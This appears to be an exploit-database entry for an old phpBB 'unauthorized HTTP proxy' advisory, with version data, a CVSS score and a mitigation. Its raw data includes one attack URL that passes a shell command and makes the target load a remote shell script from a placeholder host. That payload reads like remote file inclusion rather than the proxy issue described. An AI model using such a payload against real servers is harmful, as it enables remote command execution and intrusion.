header-logo
Suggest Exploit
vendor:
phpBB
by:
SecurityFocus
7.5
CVSS
HIGH
Unauthorized HTTP Proxy
919
CWE
Product Name: phpBB
Affected Version From: 2.0.0
Affected Version To: 2.0.11
Patch Exists: YES
Related CWE: N/A
CPE: a:phpbb:phpbb:2.0.11
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

phpBB Unauthorized HTTP Proxy Vulnerability

phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy. An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy by sending a specially crafted URL.

Mitigation:

Administrators are advised to disable the proxy feature in phpBB.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17965/info

phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy.

An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy.

http://www.example.com/somescript.php?cmd=ls%20-la&xpl=http://www.example2.com/someshell.txt

Navigation

Suggest Exploit

Services By CQR